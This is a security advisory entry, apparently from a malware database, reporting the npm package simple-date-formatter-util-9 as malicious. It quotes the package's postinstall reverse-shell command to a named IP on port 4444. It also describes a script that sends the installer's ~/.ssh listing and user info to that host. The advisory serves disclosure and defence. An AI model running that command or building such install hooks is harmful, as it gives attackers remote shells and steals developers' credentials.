MAL-2026-11547
Malicious code in simple-date-formatter-util-9 (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (3f3571b881ec73a3ebf6f381b14455f9eff112ba2166366858cfca59b56b2840) package.json declares a postinstall lifecycle hook that executes `bash -i >& /dev/tcp/124.221.154.135/4444 0>&1 &`, opening an interactive reverse shell from the installer's host to 124.221.154.135 on TCP/4444 at `npm install` time. The tarball also ships postinstall.js, which enumerates the installer's ~/.ssh directory with fs.readdirSync and POSTs the results together with os.userInfo() to https://124.221.154.135/post. The package name and 'date formatter' framing are a cover story; the shipped code is an install-time backdoor plus credential-exfiltration payload targeting the installer.
Are you affected?
Enter the version of the package you're using.
Affected packages
No fixed version published yet for simple-date-formatter-util-9 (npm). Pin to a known-safe version or switch to an alternative.